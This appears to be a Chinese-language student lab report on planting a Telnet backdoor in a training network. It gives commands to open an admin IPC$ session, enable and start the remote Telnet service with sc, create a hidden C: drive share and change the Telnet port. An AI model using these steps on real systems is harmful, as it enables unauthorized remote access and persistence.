系统后门种植实验-TELNET

学习总结：

 该实验主要针对如何开启Telnet服务。

后门是攻击者在入侵了计算机以后为了以后能方便的进入该计算机而进行的系统设置或安装的一类软件，一般是指那些绕过安全性控制而获取对程序或系统访问权的程序或方法，要求有很强的隐蔽性。其用途在于潜伏在电脑中，从事搜集信息或便于黑客进入的动作，它是一种登录系统的方法，不仅绕过系统已有的安全设置，而且还能挫败系统上各种增强的安全设置。

实验步骤：

本地开启Telnet服务

进入主机A，右键“我的电脑”->管理->服务和应用程序->服务，找到Telnet服务，启动类型设为手动并应用。

 

远程开启Telnet服务

 

（1）首先用流光嗅探等工具探得到对方密码，主要是弱口令（此步可跳过，用已知的实验机用户名密码进行试验）。

 

（2）在主机B的“控制面板-工具-文件夹选项-查看-简单的文件共享”去掉选取。

 

（3）右键“我的电脑”->管理->服务和应用程序->服务，找到Telnet服务，关闭之：

 

 

（4）回到主机A用net use命令建立ipc$连接（主机用户名密码可在实验环境右侧“切换”鼠标悬浮时看到）

 

命令：net use \\10.1.1.119\ipc$ "主机B的密码" /user:administrator

（5）用sc命令把禁用的telnet服务变成自动

（6）在主机B上可以查看telnet的启动类型已经变为自动：

 

（7）用sc命令将telnet启动

 

命令：sc \\10.1.1.119 start tlntsvr

（8）新建一个cmd环境进行telnet登录：telnet 10.1.1.119

telnet连接建立之后，可输入用户名密码等相关信息进行登录，telnet服务登录到远程主机：

 

9）登录后便可进行共享等相关操作，net share建立c$共享

 

命令：net share abc$=c:

 

10）远程更改telnet端口

 

输入tlntadmn \\10.1.1.119 config port=1000 -u administrator -p 主机B的密码

简答题：

 

 

实验截图：